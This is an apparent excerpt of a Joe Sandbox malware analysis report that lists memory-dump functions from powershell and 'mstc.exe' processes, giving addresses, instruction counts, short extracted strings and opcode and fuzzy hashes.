Memory Dump Source

Source File: 0000000F.00000002.2071004243.00007FF886E35000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E35000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff886e35000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d923edde0a84b97bd6b250c495a619e2e9ce76f4674f60256c750315ff584c89
Instruction ID: a4eeeb39744db40bc8e841b768cf0621fa5e7a77c5cf5b5b69d8ef755c2c6b08
Opcode Fuzzy Hash: d923edde0a84b97bd6b250c495a619e2e9ce76f4674f60256c750315ff584c89
Instruction Fuzzy Hash: AD21F83190CB4C4FEB59DFAC9C4A7E97FE0EB96321F04416BD048C3152DA74A85ACB92

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF886E333B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2071004243.00007FF886E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff886e30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
Instruction ID: f5d3e6d16dfc94a0c9f23397fb1d02d308ccab92e0d94519bae97981a5d63028
Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
Instruction Fuzzy Hash: 1701677111CB0D4FD744EF0CE455AA5B7E0FB95364F10056DE58AC3651DA36E882CB46

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF886E3A0FB Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2071004243.00007FF886E35000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E35000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff886e35000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39fdbb72d97205eea35eded55891a390650a09e4070a45be550eb375a59db5a1
Instruction ID: 0f813a6a0b8ebe8773502f32ec8168b28357fcd095f89e324913414438033a90
Opcode Fuzzy Hash: 39fdbb72d97205eea35eded55891a390650a09e4070a45be550eb375a59db5a1
Instruction Fuzzy Hash: 4DF0F676608A8D4FCB41DF2CD8690E4BFA0FF66211B0502ABD44CC7111DB215848C7C1

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF886F0414D Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2072649581.00007FF886F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff886f00000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2fb613eecb4c7ae633df3b5b1431449dacef5aed3fb02408943a6d5c8de2ef94
Instruction ID: fe5a5ec3b34a6ba81f3eeb32649d6090b3cf617793620269ab25a1594d960d65
Opcode Fuzzy Hash: 2fb613eecb4c7ae633df3b5b1431449dacef5aed3fb02408943a6d5c8de2ef94
Instruction Fuzzy Hash: 1EF0BE32A4C9098FD659EA4CE4004A873E0FF5836071100BAE01DC71A3DB29EC55C742

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF886F04400 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2072649581.00007FF886F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff886f00000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 64f06bcb45dcd75d54a55721aae1ede523a152901147f8e642dde97f4aed2144
Instruction ID: 1002efb92652095382f45d49def0cb718ab8cabd80fd3f7542747537ccd28d82
Opcode Fuzzy Hash: 64f06bcb45dcd75d54a55721aae1ede523a152901147f8e642dde97f4aed2144
Instruction Fuzzy Hash: 09F0B832A4C5498FEB98EA4CE4408A873E0FF08320B1100B6E009CB1A3DB2AEC45C742

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF886F041D1 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2072649581.00007FF886F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff886f00000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
Instruction ID: a4bb2769373e227d52fe35647ae8b73cc680c4287deb4a89d67fd4af698c46a4
Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
Instruction Fuzzy Hash: 44E01A31B0C808DFDA69DA0CE0409A973E1FB9836175101BBD14EC7561CB22EC61CB81

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00007FF886E38BF2 Relevance: 10.1, Strings: 8, Instructions: 85COMMON

Download Yara Rule

Strings

M_^K, xrefs: 00007FF886E38C6A
M_^?, xrefs: 00007FF886E38C2A
M_^Q, xrefs: 00007FF886E38C8A
M_^N, xrefs: 00007FF886E38C72
M_^<, xrefs: 00007FF886E38C12
M_^Y, xrefs: 00007FF886E38CBA
M_^8, xrefs: 00007FF886E38BF2
M_^J, xrefs: 00007FF886E38C62

Memory Dump Source

Source File: 0000000F.00000002.2071004243.00007FF886E35000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E35000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff886e35000_powershell.jbxd

Similarity

API ID:
String ID: M_^8$M_^<$M_^?$M_^J$M_^K$M_^N$M_^Q$M_^Y
API String ID: 0-962139525
Opcode ID: f0b13acdc57fd033fe965e99b6681d2a6810ee8ae4e943648d60ef8aa5cdf81e
Instruction ID: bc649c12419a743d39c29cedd6d98b71cb895640e6f2f1c7bcdd3d438a8d22be
Opcode Fuzzy Hash: f0b13acdc57fd033fe965e99b6681d2a6810ee8ae4e943648d60ef8aa5cdf81e
Instruction Fuzzy Hash: 3021F9B36145158AD3013ABCB841ADC7780DF653B938643F3E028CF153ED1864878AC2

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF886E306B0 Relevance: 8.9, Strings: 7, Instructions: 144COMMON

Download Yara Rule

Strings

8,, xrefs: 00007FF886E30761
H1, xrefs: 00007FF886E30711
P/, xrefs: 00007FF886E30751
(0, xrefs: 00007FF886E30781
p0, xrefs: 00007FF886E30741
/, xrefs: 00007FF886E30721
-, xrefs: 00007FF886E307A1

Memory Dump Source

Source File: 0000000F.00000002.2071004243.00007FF886E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff886e30000_powershell.jbxd

Similarity

API ID:
String ID: (0$8,$H1$P/$p0$-$/
API String ID: 0-1720265388
Opcode ID: 99c98ab9aeedb38535dcebe207e92e6b665b3bd57d8b0616c0b0ba143e9ada17
Instruction ID: 0e1c4f84841c23ce058d4d88908fed0fe1d691541e7bd4be5ec0b5b9cc87a65f
Opcode Fuzzy Hash: 99c98ab9aeedb38535dcebe207e92e6b665b3bd57d8b0616c0b0ba143e9ada17
Instruction Fuzzy Hash: DE41AF92C0EAC34FF25A9AB86D0A1766BA0BB52B44F2840FFD08C571DFD855DD1AC385

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: mstc.exePID: 5508, Parent PID: 1124COMMON

Executed Functions

Function 00007FF886E41779 Relevance: .9, Instructions: 883COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.2149132600.00007FF886E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff886e40000_mstc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f08feb9c82cf22eeb55cd433a6a3bb364d0c90263c09bc4b2081d815d2ba7def
Instruction ID: 79386c7753d7c95cfd499877922ba950905a39d00303caa602cd99d825c277fb
Opcode Fuzzy Hash: f08feb9c82cf22eeb55cd433a6a3bb364d0c90263c09bc4b2081d815d2ba7def
Instruction Fuzzy Hash: 1C52C360F68E0A4FEB94E77C94697B9B7D2FF99780F500579D44EC3292DD28AC028742

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF886E42261 Relevance: .2, Instructions: 209COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.2149132600.00007FF886E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff886e40000_mstc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b9008e35a572bd7f6a777e8de47530afe46e05c8033abf92194ba0591be5b31d
Instruction ID: 4fe6222bc92a6f396e5267a73503c13c2227bc810c187faa89b68a5ff543b1b2
Opcode Fuzzy Hash: b9008e35a572bd7f6a777e8de47530afe46e05c8033abf92194ba0591be5b31d
Instruction Fuzzy Hash: 56511020A6DAC94FD786ABB848653757FE0EF87255B1800FAE08DCB293DD085C46C346

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF886E409FA Relevance: 2.6, Strings: 2, Instructions: 52COMMON

Download Yara Rule

Strings

k:M, xrefs: 00007FF886E40A4E
:M_^, xrefs: 00007FF886E40A01

Memory Dump Source

Source File: 00000015.00000002.2149132600.00007FF886E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff886e40000_mstc.jbxd

Similarity

API ID:
String ID: :M_^$k:M
API String ID: 0-4016585720
Opcode ID: 92b71f6fb146da257351d3b0697d89821a8f064f84fe54e047a9a6dd7604ec6b
Instruction ID: 0e408c833d1492f44b24945376f086c09fb88534e775a76fb76be559bbd70d1b
Opcode Fuzzy Hash: 92b71f6fb146da257351d3b0697d89821a8f064f84fe54e047a9a6dd7604ec6b
Instruction Fuzzy Hash: D501A26BB195A94AD3027BADB4911ECBB90DE97376B0883B3D2C88D0438D18508687C6

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF886E407F2 Relevance: 1.4, Strings: 1, Instructions: 161COMMON

Download Yara Rule

Strings

<M_^, xrefs: 00007FF886E40801

Memory Dump Source

Source File: 00000015.00000002.2149132600.00007FF886E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff886e40000_mstc.jbxd

Similarity

API ID:
String ID: <M_^
API String ID: 0-1376500734
Opcode ID: 0702133a095973ae652d57b3026f068501ac420125a59c78ec2628948d7f2d98
Instruction ID: 27ed9394f3eaa00476f059a278b8f73a8cbebe8ca603f6993d77a65cea308588
Opcode Fuzzy Hash: 0702133a095973ae652d57b3026f068501ac420125a59c78ec2628948d7f2d98
Instruction Fuzzy Hash: 8A51E732A689194FE300FBACE0956EB7BE1EFE5354B508579D048C7787DD3CA8028742

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF886E413F2 Relevance: .4, Instructions: 403COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.2149132600.00007FF886E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff886e40000_mstc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 323660491b79dbc317cbaebc2207d695005dec8c1d87a8417db7c6d982191a2c
Instruction ID: 4c7884a30e138b366eebcc29eb8a64e3a8b6dccf4f8cb764a569a3d480ed2f69
Opcode Fuzzy Hash: 323660491b79dbc317cbaebc2207d695005dec8c1d87a8417db7c6d982191a2c
Instruction Fuzzy Hash: 9C31A122D59E8E4FEB40E7B8D8692FDBBB2FF55250F5402BAD04AD7197DD242C098341

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF886E413F0 Relevance: .4, Instructions: 403COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.2149132600.00007FF886E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff886e40000_mstc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ecf202278b83b2cab75ca689ca6664898bc6ba20e220d9b840d01fabbb9bb2c
Instruction ID: f10746d9c73b062d86d657007118fb2e56879beb4b55ff0cd3ba15d2269da72e
Opcode Fuzzy Hash: 4ecf202278b83b2cab75ca689ca6664898bc6ba20e220d9b840d01fabbb9bb2c
Instruction Fuzzy Hash: 1D31A132D59E4E4FEB40E7B898692FDBBB2FF55250F5402B6D04AD7197DD282C058340

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF886E40A68 Relevance: .2, Instructions: 206COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.2149132600.00007FF886E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff886e40000_mstc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e324befe9b50ed95988b07511a31251a43495f61e7e7c37a863c2febcded33b
Instruction ID: 5f748b2ac7c38d53c5f412593cab63dff42527726f1cf16ed15f185c2627f190
Opcode Fuzzy Hash: 3e324befe9b50ed95988b07511a31251a43495f61e7e7c37a863c2febcded33b
Instruction Fuzzy Hash: E851082BB1996E8ED7017BBDB8412E97B50EF933B5B4843B7D188CB183CD19644A83D1

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF886E40EEE Relevance: .2, Instructions: 196COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.2149132600.00007FF886E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff886e40000_mstc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f0887d38ce7e40dfd0b83c6bb5c7f73ab80b1ddb9e5717ce40e2edcb023ac741
Instruction ID: cc18efe2ded27e40bf34f77778b95136a56f3716268588c07d6b5897a21dce88
Opcode Fuzzy Hash: f0887d38ce7e40dfd0b83c6bb5c7f73ab80b1ddb9e5717ce40e2edcb023ac741
Instruction Fuzzy Hash: 43511721A5EAC60FE356A7BC98662B57BE1EF86260B1940FBD48DCB193DC0C5C47C352

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF886E40BF2 Relevance: .2, Instructions: 154COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.2149132600.00007FF886E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff886e40000_mstc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b9b1513b883a35e9c72642b7e815d32bb2b6726e8ab2f3576197dc1b85bf96b
Instruction ID: 2dd1f86b69d2a796dfef78ad2a3c1cd16dfd18b7a7db65031dccb423e02fedba
Opcode Fuzzy Hash: 6b9b1513b883a35e9c72642b7e815d32bb2b6726e8ab2f3576197dc1b85bf96b
Instruction Fuzzy Hash: 51411431A28A4E8FEB45EBBCD4516E97BE1FF99310F5405B6C008C7283CD28A846C751

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF886E40668 Relevance: .1, Instructions: 137COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.2149132600.00007FF886E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff886e40000_mstc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e57d7f1c6defcc7d7b468cb14e866df63c7f22bd82350ff324d37550a0bdcf3
Instruction ID: 9ea77bfb97a27e1ca0a4da976b63f9ca785bb8dc0ee15c6b1b346f7006c314ee
Opcode Fuzzy Hash: 2e57d7f1c6defcc7d7b468cb14e866df63c7f22bd82350ff324d37550a0bdcf3
Instruction Fuzzy Hash: E931DF21B189494FE6D8EB6C946A379B2D2EF99755F0401BEE00EC7393DE68AC428341

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF886E40D81 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.2149132600.00007FF886E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff886e40000_mstc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f30b93a79bdb2773af03f710acf1668943f20e6747436450f24e29ee66f98c9
Instruction ID: a6ddbdb4f2491996fa7ff0122dede6500fa0f1b3cac6229eaad434904cc1536f
Opcode Fuzzy Hash: 2f30b93a79bdb2773af03f710acf1668943f20e6747436450f24e29ee66f98c9
Instruction Fuzzy Hash: BA216261F18E494FE784B7B898593B976D2FFA5790F5442BAE40DC3283DD1CAC418742

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF886E42431 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.2149132600.00007FF886E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff886e40000_mstc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3eabff4b9e711b0a27136246a2e6baf6768a5bb6627a7647fda4fc4e1277ea15
Instruction ID: defad7151ba88cffa84518d13209332b62d387e5bec3812ca992421582173310
Opcode Fuzzy Hash: 3eabff4b9e711b0a27136246a2e6baf6768a5bb6627a7647fda4fc4e1277ea15
Instruction Fuzzy Hash: 73012110D4DAD54FE782A7385856472BFF1EFA53C0B1804ABE888C70ABE918AD46C343

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF886E40E67 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.2149132600.00007FF886E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff886e40000_mstc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 46127a36c7ae47369fb706b52d030c7b88442c058c9557099b30b95526d25d11
Instruction ID: 6d22a12fdae05bd8bbeb0eef425a59fa08f112f9bd975f8e8cbcc97409d18d99
Opcode Fuzzy Hash: 46127a36c7ae47369fb706b52d030c7b88442c058c9557099b30b95526d25d11
Instruction Fuzzy Hash: 05E0ED21B1491D4EEF40EBEC98553FCB3D2EF9C652F1042B7D50DD3296DE2898418792

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: mstc.exePID: 5316, Parent PID: 3504COMMON

Executed Functions

Function 00007FF886E3178C Relevance: .9, Instructions: 875COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2270873432.00007FF886E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff886e30000_mstc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8e9e6cdcc1814c0b5fede603f0fdd9bddd863446b87cb0f0e0d580af1779e64
Instruction ID: 6ff20e70e53028c4eafcefbdba7c984deab3a3fa6d915519f89f814cd32b835e
Opcode Fuzzy Hash: e8e9e6cdcc1814c0b5fede603f0fdd9bddd863446b87cb0f0e0d580af1779e64
Instruction Fuzzy Hash: CA428F60F28A0B4BE798EB7894697FDB7D2FF98780F504579D00EC3296DD28AC418742

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF886E307F2 Relevance: 1.4, Strings: 1, Instructions: 165COMMON

Download Yara Rule

Strings

<N_^, xrefs: 00007FF886E30801

Memory Dump Source

Source File: 00000016.00000002.2270873432.00007FF886E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff886e30000_mstc.jbxd

Similarity

API ID:
String ID: <N_^
API String ID: 0-1347224999
Opcode ID: 10ccfaa3fca56c22fa6379f03ed7ed759f61a944d627b12071a5c76e0f625e1d
Instruction ID: 92e153a812ace77aa6e5a67af03fbb185caa172fad6db48e5147d055be4753d9
Opcode Fuzzy Hash: 10ccfaa3fca56c22fa6379f03ed7ed759f61a944d627b12071a5c76e0f625e1d
Instruction Fuzzy Hash: 7451D836A6851A4FE300FF9CE0996EDBBE2FF94254B90C479D449C338BCD286845C786

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF886E313F3 Relevance: .4, Instructions: 404COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2270873432.00007FF886E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff886e30000_mstc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6762c1bed113a20be90af7a11809c36b364966416a0eca3ce86e736c4acf419
Instruction ID: ea4daa01194c1b2941d284e29d06553e8a6a934f25f81eeb78f56fc3bfec442f
Opcode Fuzzy Hash: e6762c1bed113a20be90af7a11809c36b364966416a0eca3ce86e736c4acf419
Instruction Fuzzy Hash: E331D632E18A8B4FE740E7A8D8651FDBBB2FF95290F54017AD00AD7297CD282C098380

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF886E313F0 Relevance: .4, Instructions: 403COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2270873432.00007FF886E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff886e30000_mstc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bce27435403649c8beaed348a6eb049c55c5edf818b576a17b76272cf1708f77
Instruction ID: 073edabef261bae4985a90ee92eba9dc0b482738f38b90dd3806d38a0baaa56c
Opcode Fuzzy Hash: bce27435403649c8beaed348a6eb049c55c5edf818b576a17b76272cf1708f77
Instruction Fuzzy Hash: 0C31D632D18A8B4FE740E7A8D8651FDBBB2FF55290F54017AD00AD72D7CD282C098380

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF886E30EEE Relevance: .2, Instructions: 199COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2270873432.00007FF886E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff886e30000_mstc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 789847b65065ec3e2a4c901e3f3d0fbcb9149472737a42f5edee9c86d5132123
Instruction ID: 51347f5691dae7274eb67cbee5a49bbceb98267c6c77ac8c4ea5bd79e1c43fe4
Opcode Fuzzy Hash: 789847b65065ec3e2a4c901e3f3d0fbcb9149472737a42f5edee9c86d5132123
Instruction Fuzzy Hash: 9251E421A1D6860FE356A7BC98662F57BE1EF86260B1940FBD08DCB2A3DD0C5C46C352

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF886E30668 Relevance: .1, Instructions: 137COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2270873432.00007FF886E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff886e30000_mstc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f615fd839f8f42ae186a48c569ec2c922d11db57de6cf974d096f52efb90cdb
Instruction ID: 9cf6904184dc001ce02676cfead2be114244e6b5a858cb67b8e41204248c25c2
Opcode Fuzzy Hash: 6f615fd839f8f42ae186a48c569ec2c922d11db57de6cf974d096f52efb90cdb
Instruction Fuzzy Hash: 4731E421F189494FE6D8EB6C546A379B3C2EF98755F0405BEE04EC7393DE68AC428341

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF886E322FC Relevance: .1, Instructions: 137COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2270873432.00007FF886E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff886e30000_mstc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5273808f63873cc0d1be881be7787bcee0435b872ed173af4fd7e02fd443a213
Instruction ID: dfff56ef85052a43f2c3b278c7acb2b1fa52ad60c3f8f08afe90e0a111da9d92
Opcode Fuzzy Hash: 5273808f63873cc0d1be881be7787bcee0435b872ed173af4fd7e02fd443a213
Instruction Fuzzy Hash: 5A31B121F189494FE7D8EB6C546A378B7C2EF99655F0405BEE04EC7393DE68AC428341

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF886E30C4C Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2270873432.00007FF886E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff886e30000_mstc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e3dd5d6c3fb94f15308469f2e395866842e86285142c58655b0f7a750ed070e
Instruction ID: 997364ba6d43886bd093957a5fba6545b91a6c13524e1a1036e34efe32b20aca
Opcode Fuzzy Hash: 1e3dd5d6c3fb94f15308469f2e395866842e86285142c58655b0f7a750ed070e
Instruction Fuzzy Hash: C6311C71A2890E8FEB84EBA8D4557FDB7E2FFA8341F904579D009D7286CE38A8418741

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF886E30D81 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2270873432.00007FF886E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff886e30000_mstc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9047e8c2f2675b8034b331c45b28e8a875cd5257cd8f53eb47a23da0537919f3
Instruction ID: e4217b26bf75aab727c0dec630d5e2c0c4736f6742d77debebaddffe271361ea
Opcode Fuzzy Hash: 9047e8c2f2675b8034b331c45b28e8a875cd5257cd8f53eb47a23da0537919f3
Instruction Fuzzy Hash: D4216261F18A464FE784A6E8985A3B967D2FFA5B90F5442B6E00DC3283DD18AC418742

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF886E32431 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2270873432.00007FF886E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff886e30000_mstc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bdc210cb32fcdcdd70509beaa98c460503c32038667fc568ac67c38b885be2aa
Instruction ID: 8ff0c130b6b5c3fd3b90b3a3669a5c0e06ddddfc45b823acd549b67716c8a6bf
Opcode Fuzzy Hash: bdc210cb32fcdcdd70509beaa98c460503c32038667fc568ac67c38b885be2aa
Instruction Fuzzy Hash: 93012620D0D7D74FE741A73858564B57FF1AFA5380F1804AAD4C9C70ABD9089D45C343

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF886E30E67 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2270873432.00007FF886E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff886e30000_mstc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 75de05dcf287aa7c948d711bd76ada2fa5979c13c26cbb59952a87f3421e8ceb
Instruction ID: 8b8b93b543f3586ded9d0acf2a518b94bb7fc698a6c10d2e495274d8bc058b9e
Opcode Fuzzy Hash: 75de05dcf287aa7c948d711bd76ada2fa5979c13c26cbb59952a87f3421e8ceb
Instruction Fuzzy Hash: E4E0ED21B149194FEF40EBECA8553FCB3D2EB9C692F104177D50DD3296DE2898418792

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: mstc.exePID: 8088, Parent PID: 3504COMMON

Executed Functions

Function 00007FF886E3178C Relevance: .9, Instructions: 875COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.2353440272.00007FF886E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff886e30000_mstc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c86e7217240215c874d63c31ebe8baaf0cf0df8a30d990a3011ba3910b69f8f8
Instruction ID: d9d97a7ad357188f7fb538a7dd9968619dddc508ee07ba456f888fd2558315e5
Opcode Fuzzy Hash: c86e7217240215c874d63c31ebe8baaf0cf0df8a30d990a3011ba3910b69f8f8
Instruction Fuzzy Hash: 6C428F20B28A0B4FE798F77884697B9B7D2FF99784F544579E00EC3296DD2CAC418742

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF886E307F2 Relevance: 1.4, Strings: 1, Instructions: 165COMMON

